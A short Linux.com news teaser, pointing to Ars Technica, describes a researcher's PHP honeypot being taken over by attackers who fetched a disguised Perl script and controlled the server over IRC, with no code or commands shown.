Linux.com

Home News Enterprise Computing Systems Management What a Successful Exploit of a Linux Server Looks Like

What a Successful Exploit of a Linux Server Looks Like

Like most mainstream operating systems these days, fully patched installations of Linux provide a level of security that requires a fair amount of malicious hacking to overcome. Those assurances can be completely undone by a single unpatched application, as Andre' DiMino has demonstrated when he documented an Ubuntu machine in his lab being converted into a Bitcoin-mining, denial-of-service-spewing, vulnerability-exploiting hostage under the control of attackers.

A security researcher with George Washington University, DiMino noticed several IP addresses attempting to hijack the Linux server by exploiting a now-patched PHP flaw that gave attackers the ability to remotely execute commands on vulnerable machines. DiMino was curious to know what the people behind the attacks intended to do with his machine, so he set up a "honeypot" box that, for research purposes, ran an older version of the Web development language.

The attackers' HTTP POST request contained a variety of commands that in short order downloaded a Perl script that was disguised as a PDF document file, executed it, and then deleted it. To ensure success, the attackers repeated the steps using the curl, fetch, lwp-get requests. The Perl script was programmed to sleep for periods of time, presumably to prevent administrators from noticing anything amiss. Eventually, the compromised machine connected to an Internet relay chat channel, where it downloaded another script and executed it. Then he ran forensic software and snapped lots of screen shots so everyone could follow along.

Read 5 remaining paragraphs | Comments

Read more at Ars Technica
 

Comments

Subscribe to Comments Feed

Upcoming Linux Foundation Courses

  1. LFD320 Linux Kernel Internals and Debugging
    04 Aug » 08 Aug - Virtual
    Details
  2. LFD405 Embedded Linux Development with Yocto Project
    04 Aug » 07 Aug - Santa Clara, CA
    Details
  3. LFD312 Developing Applications For Linux
    18 Aug » 22 Aug - Virtual
    Details

View All Upcoming Courses

Become an Individual Member
Check out the Friday Funnies

Sign Up For the Linux.com Newsletter


Who we are ?

The Linux Foundation is a non-profit consortium dedicated to the growth of Linux.

More About the foundation...

Frequent Questions

Join / Linux Training / Board